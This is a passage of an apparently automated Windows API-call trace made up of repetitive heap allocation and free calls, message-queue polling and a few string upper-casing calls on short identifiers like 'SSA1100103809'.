Flags=0x0, Size=0x4) returned 0x2a71d08 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0151.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0151.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0151.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0151.035] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa138 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0151.035] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0151.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0151.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0151.036] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3c0 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0151.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0151.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0151.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0151.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0151.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0151.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0151.038] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa258 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0151.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0151.038] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0151.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0151.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0151.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0151.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0151.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.039] PeekMessageW 